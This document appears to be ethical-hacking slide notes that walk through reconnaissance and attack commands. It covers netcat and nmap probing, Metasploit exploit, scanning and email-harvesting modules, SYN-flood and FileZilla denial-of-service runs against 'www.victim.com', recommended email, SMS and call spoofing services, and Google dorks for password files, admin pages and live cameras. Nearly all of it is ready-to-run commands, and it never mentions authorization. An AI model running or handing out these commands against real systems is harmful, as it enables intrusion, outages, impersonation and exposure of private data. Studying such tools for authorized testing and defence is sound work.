- Sending spoofed HTTP probes
- Proxy servers
- Port scanning, etc.
It is also used to probe a remote computer for open ports and the daemon/software running on the open ports.
Netcat commands (command line tool):
nc -v www.altoromutual.com 80   (then type an HTTP/1.0 request)
Ncat is an improved, better version, which comes free with Nmap.
ncat -C www.altoromutual.com 80   (then type GET / HTTP/1.0)
ncat -l 127.0.0.1 8080 opens a port on the local machine. Open a browser and type 127.0.0.1:8080/. Nothing happens in the browser, but in the command prompt ncat managed to record some information about the browser. This technique can be used to trace attackers.
Transferring files using ncat:
ncat -l 7000 > output.txt (opens port 7000 and accepts input on it, which will be saved in output.txt)
ncat 127.0.0.1 7000 < input.txt

Operating System (OS) detection
It is important for an attacker to determine what OS is running on the target system. The 2 most effective techniques are active fingerprinting and passive fingerprinting. Different OSes have different stacks. Hence, different OSes respond differently to the same packet sent to them by the same system. This difference in response is used as a benchmark for differentiating between various operating systems.
Active fingerprinting is the process of actively sending data packets to the target system to generate a response, which is then analyzed and compared to the list of known responses to determine the OS running on the target system.

Slide 14

Typically while analyzing responses, the following fields and techniques can be useful:
- TCP initial window size of packets
- TTL values
- ACK values of packets
- Initial Sequence Number (ISN) values
- Handling of overlapped fragments, etc.
The attacker can be traced. That means this method is not anonymous.
Nmap commands:
nmap -O -v www.altoromutual.com
nmap -A -v www.altoromutual.com

Passive fingerprinting
The problem with active fingerprinting is that it reveals the identity of the criminal.
http://lcamtuf.coredump.cx/p0f3/
p0f will try to determine the OS information by simply analyzing the data packets sent by the target system while performing usual and routine communication, e.g. if the target visits your website, sends you a file, etc.
p0f -L
p0f -i 4 (interface number)
The TTL, window size, DF bit and TOS fields in the reply TCP packet are analyzed to get the remote OS.

OS detection countermeasures:
- Change the default values of your OS like TTL, ISN, etc.
- Mislead the attacker by configuring the default values of some other OS on your system.
- Use ACLs to filter out unwanted probing packets.

Security auditing
It is a technique of scanning the victim computer for any potential security loopholes that may exist on it, using which an attacker can hack into it.
Tools: Nessus, GFI LANguard, Retina Scan, SAINT, Core Impact, NSAuditor (not free)

Attacking the target computer using METASPLOIT
In my previous blog, I have covered detailed step by step instructions on how to collect maximum information about the victim in pursuit of getting any possible weak entry points. These are popularly called vulnerabilities. Once you get any possible loopholes or vulnerabilities, it is the perfect time to ATTACK!!!
Metasploit is an open source framework for penetration testing that allows you to test the security of a network. It has a built-in large database of hundreds of known loopholes and vulnerabilities for various platforms and software. It allows you to automatically test a remote system for all these hundreds of security loopholes.

Slide 15

EXPLOIT: code, software or a tool that misuses a vulnerability or loophole on a remote machine to cause malicious results on it.
PAYLOAD: defined as the effect of executing the exploit code and some other payload code on a remote machine, which allows a medium of communication to be established between the attacker and the victim. It could be in the form of modification/deletion of data, getting shell access, file access and others.
Each EXPLOIT will support certain types of PAYLOADS.
STEPS INVOLVED
1. Identify the loophole on the victim using network reconnaissance, security auditing and penetration testing.
2. Select and configure that exploit and the various exploit options in Metasploit.
3. Select the victim computer and victim port.
4. Select the payload you wish to launch with the exploit code.
5. Launch the attack.
Metasploit commands:
>help
>banner
>connect www.altoromutual.com 80
GET / HTTP/1.0
>ping www.altoromutual.com
>show exploits
>show payloads
>show auxiliary
>search type:exploit platform:windows unsafe
>info windows/tftp/quick_tftp_pro_mode
>use windows/tftp/quick_tftp_pro_mode
windows/tftp/quick_tftp_pro_mode>show options
windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com
windows/tftp/quick_tftp_pro_mode>check
windows/tftp/quick_tftp_pro_mode>exploit
windows/tftp/quick_tftp_pro_mode>back (exit a module)

Port scanning using Metasploit
It is possible to port scan a remote computer using Metasploit. All nmap commands are valid in Metasploit.
>search portscan
>use auxiliary/scanner/portscan/tcp
>use auxiliary/scanner/portscan/syn (SYN port scan)
>use auxiliary/scanner/portscan/xmas (XMAS port scan)
>use auxiliary/scanner/portscan/ack (ACK port scan)
>show options
>set RHOSTS www.victim.com
>set PORTS 1-100
>set verbose true
>run
Slide 16

>nmap -sT -p 1-100 -Pn www.victim.com
Daemon banner grabbing using Metasploit
>use auxiliary/scanner/pop3/pop3_version
>set RHOSTS www.victim.com
>run
Similarly,
>use auxiliary/scanner/http/http_version
>set RHOSTS www.victim.com
>run
>use auxiliary/scanner/smtp/smtp_version
>set RHOSTS www.victim.com
>run
(SMTP runs on port 25, port 80 is HTTP and port 110 is POP3)
Grabbing email addresses from a website
>search collector
>use auxiliary/gather/search_email_collector
>show options
>set DOMAIN www.victim.com
>run
TCP flooding using Metasploit
It is possible to execute a DoS attack against various victims using Metasploit.
>use auxiliary/dos/tcp/synflood
>set RHOST www.victim.com
>run
FileZilla is a popular FTP server based on the Windows platform. There are 2 exploit modules in Metasploit that can be used to execute a DoS attack against some versions of the FileZilla server:
>use auxiliary/dos/windows/ftp/filezilla_admin_user
>set RHOST www.victim.com
>run
>use auxiliary/dos/windows/ftp/filezilla_server_port
>set RHOST www.victim.com
>run

Disposable email (anonymous): www.hidemyass.com
Email spoofing is the art of sending a spoofed email from somebody else's email account. www.anonymizer.in/fake-mailer
SMS spoofing (paid service, but may be worth it): http://www.spranked.com/ and http://www.phonytext.com/
Call spoofing: http://www.mobivox.com
Slide 17

Google Dorks
Google Hacking or Google Dorking is the use of clever Google search tags or commands to try and reveal sensitive data about victims like password files, vulnerable servers and others. A Google dork, according to hacker slang, is somebody whose sensitive data is revealed with the use of Google Hacking or Google Dorking.
Examples:
info:<web address>
cache:www.facebook.com password (retrieve an old cached copy of a webpage)
link:www.flyingmachine.co.in
allintitle:Login
allintitle:Login+site:timesofindia.com
allinurl:password login
allinurl:password login+site:www.google.com
inurl:/view.index.shtml (access live cameras)
inurl:/view.indexFrame.shtml Axis
ext:pdf hacking
site:gov inurl:admin login
site:in inurl:admin login
intitle:intranet inurl:intranet+site:in
"Welcome to phpMyAdmin" AND "Create new database"
"index of /etc/passwd"
Google Hacking Database (GHDB) http://www.hackersforcharity.org/ghdb/
Website mirroring
